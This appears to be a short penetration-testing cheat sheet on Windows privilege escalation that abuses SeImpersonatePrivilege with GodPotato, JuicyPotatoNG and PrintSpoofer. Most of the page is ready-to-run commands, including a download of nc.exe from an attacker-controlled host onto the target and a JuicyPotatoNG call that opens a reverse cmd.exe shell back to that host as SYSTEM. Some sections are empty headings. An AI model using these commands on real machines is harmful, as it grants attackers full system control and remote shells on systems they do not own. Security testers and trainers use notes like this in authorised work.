Page cover

Windows PrivEsc with LocalPotato

  • SeImpersonatePrivilege

GodPotato -cmd "cmd /c whoami"
Copied!

  • SeImpersonatePrivilege or SeAssignPrimaryToken

Before exploiting, we need to upload nc.exe (it is available from here) to the target machine.

Invoke-WebRequest -Uri http://10.0.0.1:8000/nc.exe -OutFile c:\Temp\nc.exe
Copied!

Next start a listener in local machine.

nc -lvnp 4444
Copied!

Then execute JuicyPotato in target machine.

JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a "10.0.0.1 4444 -e cmd.exe"
Copied!

  • SeImpersonatePrivilege

PrintSpoofer.exe -i -c cmd
Copied!

  • SeImpersonatePrivilege

  • SeImpersonatePrivilege

References

Last updated